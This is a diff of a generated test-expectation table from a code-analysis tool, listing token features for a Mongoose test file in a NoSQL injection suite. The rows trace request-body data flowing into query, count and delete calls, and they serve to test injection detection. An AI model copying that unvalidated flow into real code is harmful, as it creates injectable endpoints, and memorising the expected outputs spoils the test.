autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:5:19:8 | post | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:5:19:8 | post | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:10:19:26 | '/documents/find' | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:10:19:26 | '/documents/find' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:10:19:26 | '/documents/find' | calleeImports | express | @@ -2217,6 +11813,22 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:10:19:26 | '/documents/find' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:10:19:26 | '/documents/find' | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:10:19:26 | '/documents/find' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Document | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Mongoose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:28 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:29 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:29 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:19:29 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | (req, r ... // OK\\n} | CalleeFlexibleAccessPath | app.post | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | (req, r ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | (req, r ... // OK\\n} | calleeImports | express | @@ -2224,10 +11836,101 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | (req, r ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | (req, r ... // OK\\n} | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | (req, r ... // OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:29:132:1 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:30:19:32 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:35:19:37 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:35:19:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:35:19:37 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:19:35:19:37 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:15 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:15 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:15 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:15 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:15 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query = {} | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query = {} | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query = {} | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:11:20:20 | query = {} | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:19:20:20 | {} | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:19:20:20 | {} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:19:20:20 | {} | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:20:19:20:20 | {} | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:9 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:9 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:9 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:9 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:15 | query.title | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:15 | query.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:15 | query.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:15 | query.title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:32 | query.t ... y.title | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:32 | query.t ... y.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:32 | query.t ... y.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:5:21:32 | query.t ... y.title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:11:21:15 | title | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:11:21:15 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:11:21:15 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:11:21:15 | title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:21 | req | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:21 | req | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:21 | req | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:26 | req.body | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:26 | req.body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:26 | req.body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:26 | req.body | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:32 | req.body.title | assignedToPropName | title | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:32 | req.body.title | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:32 | req.body.title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:32 | req.body.title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:19:21:32 | req.body.title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:23:21:26 | body | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:23:21:26 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:23:21:26 | body | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:23:21:26 | body | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:28:21:32 | title | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:28:21:32 | title | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:28:21:32 | title | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:21:28:21:32 | title | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:22 | Document.aggregate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:22 | Document.aggregate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:22 | Document.aggregate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:22 | Document.aggregate | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | Documen ... query]) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | Documen ... query]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | Documen ... query]) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | Documen ... query]) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | exceptional return of Documen ... query]) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | exceptional return of Documen ... query]) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | exceptional return of Documen ... query]) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:5:24:31 | exceptional return of Documen ... query]) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:14:24:22 | aggregate | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:14:24:22 | aggregate | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:14:24:22 | aggregate | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:14:24:22 | aggregate | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:24:24:30 | [query] | CalleeFlexibleAccessPath | Document.aggregate | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:24:24:30 | [query] | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:24:24:30 | [query] | calleeImports | mongoose | @@ -2237,9 +11940,33 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:24:24:30 | [query] | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:24:24:30 | [query] | receiverName | Document | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:24:25:24:29 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:18 | Document.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:18 | Document.count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:18 | Document.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:18 | Document.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:5:27:25 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:14:27:18 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:14:27:18 | count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:14:27:18 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:14:27:18 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:20:27:24 | query | CalleeFlexibleAccessPath | Document.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:20:27:24 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:20:27:24 | query | calleeImports | mongoose | @@ -2248,6 +11975,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:20:27:24 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:20:27:24 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:27:20:27:24 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:23 | Document.deleteMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:23 | Document.deleteMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:23 | Document.deleteMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:23 | Document.deleteMany | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:5:30:30 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:14:30:23 | deleteMany | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:14:30:23 | deleteMany | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:14:30:23 | deleteMany | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:14:30:23 | deleteMany | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:25:30:29 | query | CalleeFlexibleAccessPath | Document.deleteMany | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:25:30:29 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:25:30:29 | query | calleeImports | mongoose | @@ -2256,6 +12003,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:25:30:29 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:25:30:29 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:30:25:30:29 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:12 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:12 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:22 | Document.deleteOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:22 | Document.deleteOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:22 | Document.deleteOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:22 | Document.deleteOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | Documen ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | exceptional return of Documen ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | exceptional return of Documen ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | exceptional return of Documen ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:5:33:29 | exceptional return of Documen ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:14:33:22 | deleteOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:14:33:22 | deleteOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:14:33:22 | deleteOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:14:33:22 | deleteOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:24:33:28 | query | CalleeFlexibleAccessPath | Document.deleteOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:24:33:28 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:24:33:28 | query | calleeImports | mongoose | @@ -2264,6 +12031,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:24:33:28 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:24:33:28 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:33:24:33:28 | query | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:12 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:12 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:36:5:36:12 | Document | enclosingFunctionName | app.post#functionalargument | +| 